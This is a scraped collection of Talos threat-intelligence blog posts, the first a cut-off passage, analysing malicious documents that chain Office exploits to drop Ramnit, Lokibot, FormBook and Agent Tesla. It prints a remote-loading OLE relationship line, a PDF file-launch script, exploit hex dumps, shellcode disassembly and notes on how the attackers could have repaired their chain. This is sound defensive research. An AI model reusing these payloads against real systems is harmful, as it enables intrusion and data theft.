eventually crashing with a memory access fault. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for CVE-2012-0158</div><br />This stage is responsible for the application crash. 
The attackers did not seem to have a good quality assurance process, or perhaps the technical expertise to understand what would happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts by resolving several API addresses, which allow the code to traverse all open files by brute-forcing file handle values, starting from zero and incrementing by four for each subsequent handle. If the handle exists, the shellcode checks the file size using the GetFileSize API, which takes the file handle as its parameter. If the file size is within the expected range, the shellcode maps the file in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file, all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts reading the mapped file looking for the next-stage shellcode marker, which in our test is never found because the original CVE-2017-0199 exploit file is still present in memory. That file satisfies both of the conditions the first stage shellcode checks for. 
Since the CVE-2017-0199 exploit file is opened before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next-stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error when it reads past the allocated memory blocks. <br /><br />If the attackers had been just a little more technically savvy, they would have noticed this problem and could easily have fixed it, making the two exploits work together without the prompt to load remote content being displayed to the end user. <br /><br />One possible fix involves changing a single byte to make the file size limits slightly stricter, so as to exclude the size of the original CVE-2017-0199 file. 
The other way, only slightly more complex, is to correctly handle the case where the next-stage marker is not found within the RTF, and to assume that the targeted Word process already has other RTF documents open which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will execute successfully if there are no other open RTF files, so we analysed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding the required API functions within ntdll.dll. These API functions are used to launch an instance of svchost.exe in a suspended state and to overwrite its original entry point with the final \"download and execute\" shellcode stage, which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe, uses the URLDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and then calls the ShellExecute function to launch the final payload. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. 
This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br 
/>43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2", "cvss3": {}, "published": "2017-08-14T09:55:00", "type": "talosblog", "title": "When combining exploits for added effect goes wrong", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199"], "modified": "2017-08-14T16:55:34", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-10T22:29:40", "description": "This blog post is authored by [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Paul Rascagneres](<https://twitter.com/r00tbsd>). \n \n\n\n## Summary\n\n \nCisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as \"malware as a service.\" This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. 
\n \n \n \nThe author put a lot of effort into the infection vector, using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform (hosted in the Netherlands). The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow: \n\n\n[](<https://2.bp.blogspot.com/-9-5OvNxRYYI/Wyn0YYPSOSI/AAAAAAAAAZg/U5l9TdH9gcUZrVo3cRDyBIRyp8LlrTJrgCLcBGAs/s1600/image4.jpg>)\n\n \nWe identified an infrastructure overlap between this campaign and a previous campaign we [published](<https://blog.talosintelligence.com/2017/02/pony-pub-files.html>) in February 2017 relating to Pony malware, which utilized Microsoft Publisher files to deliver its payload. It is possible that the same actor is behind both attacks, given the overlap in their infrastructure. If that is the case, the actor has been able to switch between Pony and FormBook to continue their malicious activities for more than a year. \n \n\n\n## Infection Vector\n\n \n\n\n### Phishing Campaign\n\n \nThis campaign starts with a malicious email containing two attachments. Here is a snippet of the email: \n\n\n[](<https://3.bp.blogspot.com/-PE6m8EWa2J4/Wyn0kEy0EZI/AAAAAAAAAZk/A8sXbiwFwKIjmi2PcOY6CcPXFlyjv4UBQCLcBGAs/s1600/image3.png>)\n\n \nThe email pretends to be an order sent from the sales department of a company located in Spain. The website details and phone number appear to have been copied from those of a genuine company. \n \nThe email contains two attachments: \n \n\n\n * A blank malicious Microsoft Office document template file. (.dotm)\n * A malicious PDF document that is also blank. 
(.pdf)\n\n### First Office MalDoc (Attached)\n\n \nThe email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document. \n \nIf an example document from the campaign, named \"STMORDER-442799.dotm,\" is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within \"STMORDER-442799\\word\\\\_rels\\document.xml.rels.\" Despite the file appearing to be blank, it does contain a large amount of XML information. We see the <Relationship> elements being abused: \n\n \n \n <Relationship Id=\"_id_2970\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" TargetMode=\"External\" Target=\"hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\"/></Relationships> \n \n\nThis will cause the following document to be downloaded and executed from a Japanese file-hosting platform. \n\n\n[](<https://4.bp.blogspot.com/-J7j3wI6oTCU/Wyn0p8IG41I/AAAAAAAAAZs/-E0raExSblgnH4KGzwnINPClJ8gXc-ytACLcBGAs/s1600/image2.png>)\n\n \nAt the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform \u2014 this can be found [here](<https://pomf.pyonpyon.moe/malware.txt>). 
Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8: \n\n\n[](<https://1.bp.blogspot.com/-Yp8oFjbVTT4/Wyn0yE1l9xI/AAAAAAAAAZw/IZs0XpvAJdwtfE8hA1PaNtDk5Y84HMlugCLcBGAs/s1600/image5.png>)\n\nWe were able to obtain multiple .doc files related to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF) and leverage CVE-2017-11882. \n \n\n\n### PDF document (Attached)\n\n \nAlso attached to the initial email is a PDF file which contains a JavaScript object: \n\n \n \n this.exportDataObject({ cName: \"mine001.dotm\", nLaunch: 2 }); \n \n\nThis code launches a file embedded within the PDF document. In our case, the file is an Office document named \"mine001.dotm.\" \n \n\n\n### Second Office MalDoc (Embedded)\n\n \nThe embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign put the same file in two separate locations, or whether it was on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF. \n \n\n\n### Third Office MalDoc (Downloaded)\n\n \nThe final malicious Office document is an RTF document. 
This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1): \n\n \n \n 00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000| \n 00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530| \n 00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f| \n 00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732| \n 00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000| \n 00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0| \n 000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100| \n 000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n 000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e| \n 000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006| \n 000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n 000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001| \n 00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \n \n\nWe have the beginning of the OLE compound file (CF) \u2014 named OLECF \u2014 object. \n \nThis OLECF object contains a compound file binary format (CFBF) object. This file format is described [here](<https://en.wikipedia.org/wiki/Compound_File_Binary_Format>). This object is linked to the COM object \"0002ce02\u20130000\u20130000-c000\u2013000000000046\": \n\n \n \n 00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. 
.E.n.t.| \n 00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............| \n 00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n * \n 00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................| \n 00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F| \n 00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w| \n 00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................| \n 00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.| \n 00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........| \n 000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n \n\nThis CLSID is the ID of the Equation Editor, as mentioned by [Microsoft](<https://support.microsoft.com/fr-fr/help/4055535/how-to-disable-equation-editor-3-0>). Finally, here is where and how the exploit is executed: \n\n \n \n 00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......| \n 00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......| \n 00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.| \n 00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 **1e b6** |....nJ.j.S..A...| \n 00000840 **29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6** |)..q..`#@.@.z...| \n 00000850 **26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be** |&C....N..}.F.E..| \n 00000860 **82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39** |...1..I........9| \n 00000870 **ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6** |...e.)+N........| \n 00000880 **08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83** |...iQ8..''}...e.| \n \n\nThe red value is the stream length. \n \nThe blue value is the Equation Editor MTEF header, starting with 0x3. \n \nThe green value is the font record, starting with 0x8. This vulnerability is an overflow of the font name, located in grey in the snippet above. 
The overflow redirects the control flow in order to execute the RET instruction at the address 0x0041d1e8 (in pink). \n \nFinally, a shellcode is executed. \n \nHere is the first stage of the shellcode: \n\n \n \n user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0 \n mov eax, 0xffba42c3 \n not eax \n mov edi, dword [eax] \n mov esi, dword [edi] \n mov ebp, 0xffb998c6 \n not ebp \n mov ecx, dword [ebp + 0x77] \n push esi \n call ecx \n add eax, 0xb2dd663 \n sub eax, 0xb2dd54d \n jmp eax \n \n\nThe purpose of this stage is to call GlobalLock() (the first call) and finally jump into the second stage of the shellcode, shown in bold orange in the hexadecimal dump above. \n \nThe purpose of the second stage is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe). \n \n \n\n\n## Final payload: FormBook\n\n \nThe final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples. \n \nFormBook is an inexpensive stealer available as \"malware as a service.\" It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in depth, since there are excellent posts on the malware written by other researchers. \n \n\n\n## Overlaps with previous campaigns\n\n \nIn [February 2017](<https://blog.talosintelligence.com/2017/02/pony-pub-files.html>), we published an article about another stealer using Publisher and a public exploit to compromise systems. 
We found three interesting samples related to both that case and our current FormBook case: \n \n\n\n * 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)\n * 82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\n * 8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\n \n \nThese three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article: \n \n\n\n * hxxp://alphastand[.]top/alien/fre.php -> command and control (C2) server from 2017\n * hxxp://ukonlinejfk[.]ru/mine/fre.php \n * hxxp://alphastand[.]trade/alien/fre.php -> C2 server from 2017\n * hxxp://igtckeep[.]com/dor/fre.php \n * hxxp://alphastand[.]win/alien/fre.php -> C2 server from 2017\n * hxxp://kbfvzoboss[.]bid/alien/fre.php -> C2 server from 2017\n * hxxp://www.cretezzy[.]com/do/ -> FormBook C2 server\n * hxxp://www.beemptty[.]com/se/ -> FormBook C2 server\n \n \nThe shared infrastructure suggests that a single actor is currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer. \n \n\n\n## Conclusion\n\n \nThis case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template that exploits one vulnerability in order to download an additional Office RTF document, which in turn uses a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform to store the malicious document and a compromised WordPress site to store the final payload. 
We did notice that the file-sharing platform is reactive, removing the malicious files quickly and stopping the infection chain. \n \nSome technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month, this actor used two stealers in parallel on the same infrastructure. Based on the information we have today, the actor no longer uses Pony but has switched to FormBook in order to steal information from compromised systems. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n\n\n[](<https://3.bp.blogspot.com/-mlMbcYQ3qsI/Wyn1AySpA-I/AAAAAAAAAZ4/nZhPWCs28ZcGmAw112w9dm8l47WVleUbwCLcBGAs/s1600/image1.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. 
\n \nNetwork Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
\n \n\n\n## IOCs\n\n### PDF\n\n### Embedded And Attached dotm\n\n### Malicious Document Hosted On The Files Sharing Platform\n\n### PE32 Hosted On The irishlebanese Website\n\n### C2 Servers\n\n### Overlaps Samples", "cvss3": {}, "published": "2018-06-20T08:00:00", "type": "talosblog", "title": "My Little FormBook", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2018-06-22T06:50:12", "id": "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2jDxbPnn_WQ/my-little-formbook.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T08:23:31", "description": "This blog post was authored by [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and [Holger Unterbrink](<http://blogs.cisco.com/author/holgerunterbrink>) 
with contributions from [Emmanuel Tacheau](<https://blogs.cisco.com/author/emmanueltacheau>). \n \n \n\n\n### Executive Summary\n\n \nCisco Talos has discovered a new malware campaign that drops the sophisticated information-stealing trojan called \"Agent Tesla,\" and other malware such as the Loki information stealer. Initially, Talos' telemetry systems detected a highly suspicious document that wasn't picked up by common antivirus solutions. However, [Threat Grid](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>), Cisco's unified malware analysis and threat intelligence platform, identified the unknown file as malware. The adversaries behind this malware use a well-known exploit chain, but modified it in such a way so that antivirus solutions don't detect it. In this post, we will outline the steps the adversaries took to remain undetected, and why it's important to use more sophisticated software to track these kinds of attacks. If undetected, Agent Tesla has the ability to steal user's login information from a number of important pieces of software, such as Google Chrome, Mozilla Firefox, Microsoft Outlook and many others. It can also be used to capture screenshots, record webcams, and allow attackers to install additional malware on infected systems. \n \n \n \n\n\n### Technical Details\n\n \nIn most cases, the first stage of the attack occurred in a similar way to the FormBook malware campaign, which we discussed earlier this year in a [blog post](<https://blog.talosintelligence.com/2018/06/my-little-formbook.html>). The actors behind the previous FormBook campaign used CVE-2017-0199 \u2014 a remote code execution vulnerability in multiple versions of Microsoft Office \u2014 to download and open an RTF document from inside a malicious DOCX file. We have also observed newer campaigns being used to distribute Agent Tesla and Loki that are leveraging CVE-2017-11882. 
An example of one of the malware distribution URLs is in the screenshot below. Besides Agent Tesla and Loki, this infrastructure is also distributing many other malware families, such as Gamarue, which has the ability to completely take over a user's machine and has the same capabilities as a typical information stealer.

The aforementioned FormBook blog contains more information about this stage. Many users have the assumption that modern Microsoft Word documents are less dangerous than RTF or DOC files. While this is partially true, attackers can still find ways with these newer file formats to exploit various vulnerabilities.

[Figure 1 - First stage exploit](<https://4.bp.blogspot.com/-ILV99MjYnYg/W8BAtVH4IMI/AAAAAAAABGk/bB1Yb8eFqgstw9tlTMs6jO-9mc3LilCNgCEwYBhgL/s1600/image4.jpg>)

